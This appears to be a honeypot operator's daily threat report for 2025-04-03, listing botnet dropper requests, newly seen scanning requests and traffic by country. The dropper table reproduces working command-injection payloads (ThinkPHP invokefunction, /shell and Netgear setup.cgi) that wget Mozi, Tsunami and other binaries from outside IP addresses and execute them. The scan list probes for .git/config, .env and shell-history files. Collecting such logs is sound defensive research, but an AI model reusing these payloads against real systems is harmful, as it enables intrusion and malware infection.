Skip to main content
  1. Daily-Posts/

Report: 2025-04-03

·1054 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-03
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 23 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 93 new requests that have never been observed before (these were added to the monitored request database).

A total of 2508 requests were recorded during the day, originating from 23 different countries, with a peak of 849 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRDubai
CNGeorgia
MY
US

botnet_dropper_behaviour
#

remote_addrrequest
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
77.239.214.188GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
83.63.18.167GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
61.63.126.21GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
51.190.15.243GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
36.41.184.119GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
88.202.136.16GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
106.107.187.124GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
186.29.199.182GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
123.157.136.106GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
31.189.132.161GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
58.242.106.187GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
1.162.204.229GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
222.137.2.57GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://222.137.2.57:34292/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
175.182.207.63GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
58.58.30.134GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
90.214.52.113GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
124.150.45.204GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
220.170.80.79GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
184.68.59.78GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
140.207.30.37GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
88.247.162.58GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
1.174.21.177GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
713\x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00pro.ip-api.com\x00
913CONNECT pro.ip-api.com:443 HTTP/1.1
1413GET /_media/.git/config HTTP/1.1
1423GET /.vscode/.git/config HTTP/1.1
1433GET /.svn/.git/config HTTP/1.1
1483GET /.docker/.git/config HTTP/1.1
1663GET /_public/.git/config HTTP/1.1
1673GET /zend/.git/config HTTP/1.1
1683GET /_site/.git/config HTTP/1.1
1693GET /wordpress/.git/config HTTP/1.1
1703GET /.jenkins/.git/config HTTP/1.1
1713GET /_dev/.git/config HTTP/1.1
1723GET /.github/.git/config HTTP/1.1
1733GET /_backup/.git/config HTTP/1.1
1743GET /_docs/.git/config HTTP/1.1
1753GET /_static/.git/config HTTP/1.1
1763GET /_private/.git/config HTTP/1.1
1773GET /workspace/.git/config HTTP/1.1
1783GET /_source/.git/config HTTP/1.1
1793GET /Module1/js/Module_2o6q5no3oqp65504359524o2150s4333.js HTTP/1.1
1803GET /.config/.git/config HTTP/1.1
1833GET /_images/.git/config HTTP/1.1
1843GET /_admin/.git/config HTTP/1.1
1853GET /users/.git/config HTTP/1.1
1863GET /.gitlab/.git/config HTTP/1.1
1873GET /_core/.git/config HTTP/1.1
1883GET /_archive/.git/config HTTP/1.1
1893GET /www-data/.git/config HTTP/1.1
1903GET /_modules/.git/config HTTP/1.1
1923GET /utility/.git/config HTTP/1.1
1933GET /.temp/.git/config HTTP/1.1
1943GET /_app/.git/config HTTP/1.1
1953GET /_js/.git/config HTTP/1.1
1963GET /.secret/.git/config HTTP/1.1
1973GET /_cache/.git/config HTTP/1.1
1983GET /_lib/.git/config HTTP/1.1
1993GET /_old/.git/config HTTP/1.1
2003GET /_stage/.git/config HTTP/1.1
2013GET /_data/.git/config HTTP/1.1
2023GET /.deploy/.git/config HTTP/1.1
2033GET /.local/.git/config HTTP/1.1
2043GET /_test/.git/config HTTP/1.1
2053GET /.tmp/.git/config HTTP/1.1
2063GET /_api/.git/config HTTP/1.1
2083GET /_assets/.git/config HTTP/1.1
3152\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA8\x84\xF7\x7F\x00\x00`\xF4\x82\x18d\x00\x00\x00\xE0\x81\xCD\x84\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
4141GET /jasperserver-pro/login.html HTTP/1.1
4151GET /jasperserver/login.html HTTP/1.1
4211GET /v1 HTTP/1.1
4261GET /application.ini HTTP/1.1
4291GET /administrator/phpinfo.php HTTP/1.1
4361GET /Odin/http/call1743701151 HTTP/1.1
4371GET /OdinHttpCall1743701151 HTTP/1.1
4381GET /odinhttpcall1743701151 HTTP/1.1
4531GET /socket.io/1/?t=1743704401772 HTTP/1.1
4541GET /socket.io/1/?t=1743704250154 HTTP/1.1
4551GET /ban.php HTTP/1.1
4691GET /conf/config.ini HTTP/1.1
4711GET /debug/default HTTP/1.1
4721GET /develop/info.php HTTP/1.1
4731GET /database.cfg HTTP/1.1
4741GET /config.php.bak HTTP/1.1
4761GET /a.php HTTP/1.1
4771GET /connectionstrings.xml HTTP/1.1
4791GET /connectionstrings.json HTTP/1.1
4801GET /configuration.yaml HTTP/1.1
4831GET /development.ini HTTP/1.1
4851GET /config.ini.bak HTTP/1.1
4861GET /configure.php.bak HTTP/1.1
4911GET /app.config HTTP/1.1
4951GET /odinhttpcall1743642964 HTTP/1.1
4961GET /OdinHttpCall1743642964 HTTP/1.1
4971GET /Odin/http/call1743642964 HTTP/1.1
5291\x00\x0E8N\x1E\xF6\x81\x9C\xDB<\xC4\x00\x00\x00\x00\x00
5301\x00\x0E\x08N\x1E\xF6\x81\x9C\xDB<\xC4\x00\x00\x00\x00\x00
5651GET /socket.io/1/?t=1743668880196 HTTP/1.1
6191GET /.production.env HTTP/1.1
6211GET /.env_2 HTTP/1.1
6221GET /.env1 HTTP/1.1
6231GET /.env.2 HTTP/1.1
6241GET /.env.1 HTTP/1.1
6361GET /.powenv HTTP/1.1
6371GET /.profile HTTP/1.1
6391GET /.bashrc HTTP/1.1
6451GET /.flaskenv HTTP/1.1
6461GET /.editorconfig HTTP/1.1
6471GET /.bash_profile HTTP/1.1
6491GET /.bash_history HTTP/1.1
6501GET /../../web.config HTTP/1.1
6511GET /app.yaml HTTP/1.1
6521GET /app.json HTTP/1.1
6531GET /app.conf HTTP/1.1
6551GET /_profiler/info HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0849NL
1261US
2241GB
3233BG
4170MY
5162DE
670PL
752KR
848ID
945BN
1036HK
1136FR
1233TW
1332BE
1430CN
1530JP
1627SC
1715NO
1814AZ
1912UA
2011PT
2111CA
2211IN
239RU
249NG
258SG
268VN
278CH
285RO
295AU
304GH
314IT
323TR
333AE
342CY
352MC
361MK
371AR
381IR
391EC
401ES
411IQ
421CO
431RS
441LT

Related

Report: 2025-04-02
·576 words
Repport Daily
Report: 2025-04-01
·767 words
Repport Daily
Report: 2025-03-31
·1556 words
Repport Daily